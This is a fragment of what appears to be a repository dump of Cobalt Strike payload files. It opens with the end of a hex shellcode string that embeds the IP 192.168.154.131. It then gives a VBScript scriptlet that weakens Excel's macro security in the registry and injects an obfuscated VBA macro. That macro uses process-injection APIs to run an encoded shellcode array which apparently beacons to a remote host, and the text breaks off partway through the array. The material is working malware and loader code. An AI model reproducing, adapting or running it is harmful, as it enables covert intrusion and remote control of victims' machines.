\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34
\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\"\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct",
    "content": "<?XML version=\"1.0\"?>\n<scriptlet>\n\t<registration progid=\"e00684\" classid=\"{53cb5c98-fa0e-4378-99a4-8743642ed01d}\" >\n\t\t<script language=\"vbscript\">\n\t\t<![CDATA[\n\t\t\tDim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule\n\nSet objExcel = CreateObject(\"Excel.Application\")\nobjExcel.Visible = False\n\nSet WshShell = CreateObject(\"Wscript.Shell\")\n\nfunction RegExists(regKey)\n\ton error resume next\n\tWshShell.RegRead regKey\n\tRegExists = (Err.number = 0)\nend function\n\n' Get the old AccessVBOM value\nRegPath = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" & objExcel.Version & \"\\Excel\\Security\\AccessVBOM\"\n\nif RegExists(RegPath) then\n\taction = WshShell.RegRead(RegPath)\nelse\n\taction = \"\"\nend if\n\n' Weaken the target\nWshShell.RegWrite RegPath, 1, \"REG_DWORD\"\n\n' Run the macro\nSet objWorkbook = objExcel.Workbooks.Add()\nSet xlmodule = objWorkbook.VBProject.VBComponents.Add(1)\nxlmodule.CodeModule.AddFromString \"Private \"&\"Type PRO\"&\"CESS_INF\"&\"ORMATION\"&Chr(10)&\"    hPro\"&\"cess As \"&\"Long\"&Chr(10)&\"    hThr\"&\"ead As L\"&\"ong\"&Chr(10)&\"    dwPr\"&\"ocessId \"&\"As Long\"&Chr(10)&\"    dwTh\"&\"readId A\"&\"s Long\"&Chr(10)& _\n\"End Type\"&Chr(10)&Chr(10)&\"Private \"&\"Type STA\"&\"RTUPINFO\"&Chr(10)&\"    cb A\"&\"s Long\"&Chr(10)&\"    lpRe\"&\"served A\"&\"s String\"&Chr(10)&\"    lpDe\"&\"sktop As\"&\" String\"&Chr(10)&\"    lpTi\"&\"tle As S\"&\"tring\"& _\nChr(10)&\"    dwX \"&\"As Long\"&Chr(10)&\"    dwY \"&\"As Long\"&Chr(10)&\"    dwXS\"&\"ize As L\"&\"ong\"&Chr(10)&\"    dwYS\"&\"ize As L\"&\"ong\"&Chr(10)&\"    dwXC\"&\"ountChar\"&\"s As Lon\"&\"g\"&Chr(10)&\"    dwYC\"&\"ountChar\"& _\n\"s As Lon\"&\"g\"&Chr(10)&\"    dwFi\"&\"llAttrib\"&\"ute As L\"&\"ong\"&Chr(10)&\"    dwFl\"&\"ags As L\"&\"ong\"&Chr(10)&\"    wSho\"&\"wWindow \"&\"As Integ\"&\"er\"&Chr(10)&\"    cbRe\"&\"served2 \"&\"As Integ\"&\"er\"&Chr(10)&\"    lpRe\"& _\n\"served2 \"&\"As 
Long\"&Chr(10)&\"    hStd\"&\"Input As\"&\" Long\"&Chr(10)&\"    hStd\"&\"Output A\"&\"s Long\"&Chr(10)&\"    hStd\"&\"Error As\"&\" Long\"&Chr(10)&\"End Type\"&Chr(10)&Chr(10)&Chr(35)&\"If VBA7 \"&\"Then\"&Chr(10)& _\n\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Cre\"&\"ateStuff\"&\" Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreateRe\"&\"moteThre\"&\"ad\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)& _\n\" ByVal l\"&\"pThreadA\"&\"ttribute\"&\"s As Lon\"&\"g\"&Chr(44)&\" ByVal d\"&\"wStackSi\"&\"ze As Lo\"&\"ng\"&Chr(44)&\" ByVal l\"&\"pStartAd\"&\"dress As\"&\" LongPtr\"&Chr(44)&\" lpParam\"&\"eter As \"&\"Long\"&Chr(44)&\" ByVal d\"& _\n\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpThrea\"&\"dID As L\"&\"ong\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion All\"&\"ocStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"& _\nChr(34)&\"VirtualA\"&\"llocEx\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"pAddr As\"&\" Long\"&Chr(44)&\" ByVal l\"&\"Size As \"&\"Long\"&Chr(44)&\" ByVal f\"&\"lAllocat\"&\"ionType \"&\"As Long\"& _\nChr(44)&\" ByVal f\"&\"lProtect\"&\" As Long\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Wri\"&\"teStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"WritePro\"& _\n\"cessMemo\"&\"ry\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"Dest As \"&\"LongPtr\"&Chr(44)&\" ByRef S\"&\"ource As\"&\" Any\"&Chr(44)&\" ByVal L\"&\"ength As\"&\" Long\"&Chr(44)&\" ByVal L\"& _\n\"engthWro\"&\"te As Lo\"&\"ngPtr\"&Chr(41)&\" As Long\"&\"Ptr\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are PtrS\"&\"afe Func\"&\"tion Run\"&\"Stuff Li\"&\"b \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreatePr\"&\"ocessA\"&Chr(34)& _\n\" \"&Chr(40)&\"ByVal lp\"&\"Applicat\"&\"ionName \"&\"As Strin\"&\"g\"&Chr(44)&\" ByVal 
l\"&\"pCommand\"&\"Line As \"&\"String\"&Chr(44)&\" lpProce\"&\"ssAttrib\"&\"utes As \"&\"Any\"&Chr(44)&\" lpThrea\"&\"dAttribu\"&\"tes As A\"&\"ny\"& _\nChr(44)&\" ByVal b\"&\"InheritH\"&\"andles A\"&\"s Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpEnvir\"&\"onment A\"&\"s Any\"&Chr(44)&\" ByVal l\"&\"pCurrent\"&\"Director\"&\"y As Str\"&\"ing\"&Chr(44)& _\n\" lpStart\"&\"upInfo A\"&\"s STARTU\"&\"PINFO\"&Chr(44)&\" lpProce\"&\"ssInform\"&\"ation As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(41)&\" As Long\"&Chr(10)&Chr(35)&\"Else\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Cre\"& _\n\"ateStuff\"&\" Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreateRe\"&\"moteThre\"&\"ad\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"&\"pThreadA\"&\"ttribute\"&\"s As Lon\"&\"g\"&Chr(44)& _\n\" ByVal d\"&\"wStackSi\"&\"ze As Lo\"&\"ng\"&Chr(44)&\" ByVal l\"&\"pStartAd\"&\"dress As\"&\" Long\"&Chr(44)&\" lpParam\"&\"eter As \"&\"Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpThrea\"&\"dID As L\"& _\n\"ong\"&Chr(41)&\" As Long\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion All\"&\"ocStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"VirtualA\"&\"llocEx\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"& _\n\"s Long\"&Chr(44)&\" ByVal l\"&\"pAddr As\"&\" Long\"&Chr(44)&\" ByVal l\"&\"Size As \"&\"Long\"&Chr(44)&\" ByVal f\"&\"lAllocat\"&\"ionType \"&\"As Long\"&Chr(44)&\" ByVal f\"&\"lProtect\"&\" As Long\"&Chr(41)&\" As Long\"&Chr(10)& _\n\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Wri\"&\"teStuff \"&\"Lib \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"WritePro\"&\"cessMemo\"&\"ry\"&Chr(34)&\" \"&Chr(40)&\"ByVal hP\"&\"rocess A\"&\"s Long\"&Chr(44)&\" ByVal l\"& _\n\"Dest As \"&\"Long\"&Chr(44)&\" ByRef S\"&\"ource As\"&\" Any\"&Chr(44)&\" ByVal L\"&\"ength As\"&\" Long\"&Chr(44)&\" ByVal L\"&\"engthWro\"&\"te As 
Lo\"&\"ng\"&Chr(41)&\" As Long\"&Chr(10)&\"    Priv\"&\"ate Decl\"&\"are Func\"&\"tion Run\"& _\n\"Stuff Li\"&\"b \"&Chr(34)&\"kernel32\"&Chr(34)&\" Alias \"&Chr(34)&\"CreatePr\"&\"ocessA\"&Chr(34)&\" \"&Chr(40)&\"ByVal lp\"&\"Applicat\"&\"ionName \"&\"As Strin\"&\"g\"&Chr(44)&\" ByVal l\"&\"pCommand\"&\"Line As \"&\"String\"&Chr(44)& _\n\" lpProce\"&\"ssAttrib\"&\"utes As \"&\"Any\"&Chr(44)&\" lpThrea\"&\"dAttribu\"&\"tes As A\"&\"ny\"&Chr(44)&\" ByVal b\"&\"InheritH\"&\"andles A\"&\"s Long\"&Chr(44)&\" ByVal d\"&\"wCreatio\"&\"nFlags A\"&\"s Long\"&Chr(44)&\" lpEnvir\"& _\n\"onment A\"&\"s Any\"&Chr(44)&\" ByVal l\"&\"pCurrent\"&\"Driector\"&\"y As Str\"&\"ing\"&Chr(44)&\" lpStart\"&\"upInfo A\"&\"s STARTU\"&\"PINFO\"&Chr(44)&\" lpProce\"&\"ssInform\"&\"ation As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(41)& _\n\" As Long\"&Chr(10)&Chr(35)&\"End If\"&Chr(10)&Chr(10)&\"Sub Auto\"&\"_Open\"&Chr(40)&Chr(41)&Chr(10)&\"    Dim \"&\"myByte A\"&\"s Long\"&Chr(44)&\" myArray\"&\" As Vari\"&\"ant\"&Chr(44)&\" offset \"&\"As Long\"&Chr(10)&\"    Dim \"& _\n\"pInfo As\"&\" PROCESS\"&\"_INFORMA\"&\"TION\"&Chr(10)&\"    Dim \"&\"sInfo As\"&\" STARTUP\"&\"INFO\"&Chr(10)&\"    Dim \"&\"sNull As\"&\" String\"&Chr(10)&\"    Dim \"&\"sProc As\"&\" String\"&Chr(10)&Chr(10)&Chr(35)&\"If VBA7 \"& _\n\"Then\"&Chr(10)&\"    Dim \"&\"rwxpage \"&\"As LongP\"&\"tr\"&Chr(44)&\" res As \"&\"LongPtr\"&Chr(10)&Chr(35)&\"Else\"&Chr(10)&\"    Dim \"&\"rwxpage \"&\"As Long\"&Chr(44)&\" res As \"&\"Long\"&Chr(10)&Chr(35)&\"End If\"&Chr(10)& _\n\"    myAr\"&\"ray \"&Chr(61)&\" Array\"&Chr(40)&Chr(45)&\"4\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"96\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&\"49\"& _\nChr(44)&Chr(45)&\"46\"&Chr(44)&\"100\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"48\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"12\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"20\"&Chr(44)&Chr(45)&\"117\"& 
_\nChr(44)&\"114\"&Chr(44)&\"40\"&Chr(44)&\"15\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"74\"&Chr(44)&\"38\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&Chr(45)&\"84\"&Chr(44)&\"60\"&Chr(44)&\"97\"& _\nChr(44)&\"124\"&Chr(44)&\"2\"&Chr(44)&\"44\"&Chr(44)&\"32\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&Chr(45)&\"49\"&Chr(44)&\" _\"&Chr(10)&\"13\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&Chr(45)&\"16\"&Chr(44)& _\n\"82\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"82\"&Chr(44)&\"16\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"66\"&Chr(44)&\"60\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"64\"&Chr(44)&\"120\"&Chr(44)& _\nChr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&\"116\"&Chr(44)&\"74\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&\"80\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"72\"&Chr(44)&\"24\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"32\"& _\nChr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&Chr(45)&\"29\"&Chr(44)&\"60\"&Chr(44)&\"73\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"52\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"42\"&Chr(44)&\"49\"&Chr(44)& _\nChr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&Chr(45)&\"84\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&Chr(45)&\"49\"&Chr(44)&\"13\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&\"56\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"117\"& _\nChr(44)&Chr(45)&\"12\"&Chr(44)&\"3\"&Chr(44)&\"125\"&Chr(44)&Chr(45)&\"8\"&Chr(44)&\"59\"&Chr(44)&\"125\"&Chr(44)&\"36\"&Chr(44)&\"117\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"36\"& _\nChr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&\"102\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"12\"&Chr(44)&\"75\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"88\"&Chr(44)&\"28\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"45\"&Chr(44)&Chr(45)&\"117\"&Chr(44)& _\n\"4\"&Chr(44)&\" 
_\"&Chr(10)&Chr(45)&\"117\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"48\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&\"68\"&Chr(44)&\"36\"&Chr(44)&\"36\"&Chr(44)&\"91\"&Chr(44)&\"91\"&Chr(44)&\"97\"&Chr(44)&\"89\"&Chr(44)&\"90\"&Chr(44)& _\n\"81\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"88\"&Chr(44)&\"95\"&Chr(44)&\"90\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"18\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&Chr(45)&\"122\"&Chr(44)&\"93\"&Chr(44)&\"104\"&Chr(44)&\"110\"& _\nChr(44)&\"101\"&Chr(44)&\"116\"&Chr(44)&\"0\"&Chr(44)&\"104\"&Chr(44)&\"119\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"105\"&Chr(44)&\"84\"&Chr(44)&\"104\"&Chr(44)&\"76\"&Chr(44)&\"119\"&Chr(44)&\"38\"&Chr(44)&\"7\"&Chr(44)&Chr(45)& _\n\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"43\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"104\"&Chr(44)&\"58\"&Chr(44)&\"86\"&Chr(44)&\"121\"&Chr(44)&Chr(45)& _\n\"89\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"91\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"55\"&Chr(44)&\"81\"&Chr(44)&\"81\"&Chr(44)& _\n\"106\"&Chr(44)&\"3\"&Chr(44)&\"81\"&Chr(44)&\"81\"&Chr(44)&\"104\"&Chr(44)&\"36\"&Chr(44)&\"5\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"83\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"97\"& _\nChr(44)&\" _\"&Chr(10)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"112\"&Chr(44)&\"91\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"46\"&Chr(44)&\"82\"&Chr(44)&\"104\"&Chr(44)&\"0\"&Chr(44)& _\n\"2\"&Chr(44)&\"96\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&\"82\"&Chr(44)&\"82\"&Chr(44)&\"82\"&Chr(44)&\"83\"&Chr(44)&\"82\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"85\"&Chr(44)&\"46\"&Chr(44)&\"59\"&Chr(44)&Chr(45)& 
_\n\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"125\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&\"80\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"&Chr(44)&\"87\"&Chr(44)&\"106\"&Chr(44)& _\nChr(45)&\"1\"&Chr(44)&\"83\"&Chr(44)&\"86\"&Chr(44)&\" _\"&Chr(10)&\"104\"&Chr(44)&\"45\"&Chr(44)&\"6\"&Chr(44)&\"24\"&Chr(44)&\"123\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"& _\nChr(44)&\"15\"&Chr(44)&Chr(45)&\"124\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"10\"&Chr(44)&\"116\"&Chr(44)&\"4\"&Chr(44)& _\nChr(45)&\"119\"&Chr(44)&Chr(45)&\"7\"&Chr(44)&Chr(45)&\"21\"&Chr(44)&\"9\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"86\"&Chr(44)&Chr(45)&\"59\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&\"93\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)& _\nChr(45)&\"119\"&Chr(44)&Chr(45)&\"63\"&Chr(44)&\"104\"&Chr(44)&\"69\"&Chr(44)&\"33\"&Chr(44)&\"94\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"43\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"87\"& _\nChr(44)&\"106\"&Chr(44)&\"7\"&Chr(44)&\"81\"&Chr(44)&\"86\"&Chr(44)&\"80\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"87\"&Chr(44)&Chr(45)&\"32\"&Chr(44)&\"11\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)& _\n\"65\"&Chr(44)&\"0\"&Chr(44)&\"47\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"57\"&Chr(44)&Chr(45)&\"57\"&Chr(44)&\"116\"&Chr(44)&Chr(45)&\"73\"&Chr(44)&\"49\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"111\"&Chr(44)& _\n\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&Chr(45)&\"23\"&Chr(44)&Chr(45)&\"55\"&Chr(44)&\"1\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"1\"& 
_\nChr(44)&Chr(45)&\"1\"&Chr(44)&\"47\"&Chr(44)&\"119\"&Chr(44)&\"98\"&Chr(44)&\"78\"&Chr(44)&\"53\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"& _\nChr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)& _\n\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)& _\n\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"& _\nChr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"& _\nChr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"0\"&Chr(44)&\"85\"&Chr(44)&\"115\"&Chr(44)&\"101\"&Chr(44)&\"114\"&Chr(44)&\"45\"&Chr(44)&\"65\"&Chr(44)&\"103\"&Chr(44)&\"101\"&Chr(44)& _\n\"110\"&Chr(44)&\"116\"&Chr(44)&\"58\"&Chr(44)&\"32\"&Chr(44)&\"77\"&Chr(44)&\"111\"&Chr(44)&\"122\"&Chr(44)&\"105\"&Chr(44)&\"108\"&Chr(44)&\"108\"&Chr(44)&\"97\"&Chr(44)&\"47\"&Chr(44)&\"53\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)& _\n\"32\"&Chr(44)&\"40\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"112\"&Chr(44)&\"97\"&Chr(44)&\"116\"&Chr(44)&\"105\"&Chr(44)&\"98\"&Chr(44)&\"108\"&Chr(44)&\"101\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"77\"&Chr(44)& _\n\" 
_\"&Chr(10)&\"83\"&Chr(44)&\"73\"&Chr(44)&\"69\"&Chr(44)&\"32\"&Chr(44)&\"49\"&Chr(44)&\"48\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"87\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"100\"&Chr(44)&\"111\"& _\nChr(44)&\"119\"&Chr(44)&\"115\"&Chr(44)&\"32\"&Chr(44)&\"78\"&Chr(44)&\"84\"&Chr(44)&\"32\"&Chr(44)&\"54\"&Chr(44)&\"46\"&Chr(44)&\"50\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"87\"&Chr(44)&\"105\"&Chr(44)&\"110\"&Chr(44)&\"54\"&Chr(44)& _\n\"52\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"120\"&Chr(44)&\"54\"&Chr(44)&\"52\"&Chr(44)&\"59\"&Chr(44)&\"32\"&Chr(44)&\"84\"&Chr(44)&\"114\"&Chr(44)&\" _\"&Chr(10)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"101\"&Chr(44)&\"110\"&Chr(44)& _\n\"116\"&Chr(44)&\"47\"&Chr(44)&\"54\"&Chr(44)&\"46\"&Chr(44)&\"48\"&Chr(44)&\"41\"&Chr(44)&\"13\"&Chr(44)&\"10\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"& _\nChr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)& _\n\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)& _\n\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"& _\nChr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"& _\nChr(44)&\" 
_\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)& _\n\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)& _\n\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"& 